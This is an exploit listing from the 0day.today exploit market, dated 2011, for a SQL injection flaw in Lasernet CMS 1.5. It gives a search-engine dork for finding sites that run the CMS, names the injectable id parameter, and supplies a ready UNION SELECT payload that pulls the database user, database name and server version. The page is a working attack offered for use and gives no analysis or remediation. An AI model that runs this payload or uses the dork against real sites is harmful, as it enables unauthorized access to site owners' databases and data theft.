[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lasernet CMS Version 1.5 SQL Injection Vulnerability

Author
p0pc0rn
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16637
Category
web applications
Date add
09-08-2011
Platform
php
Title : LASERnet CMS  Vulnerable to SQL Injection
Vendor : http://lasernet.gr/cms.php
Dork : intext:"Powered by Lasernet"
Category: WebApps
 
http://localhost.com/index.php?id=[SQL]
 
Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+



#  0day.today [2024-12-25]  #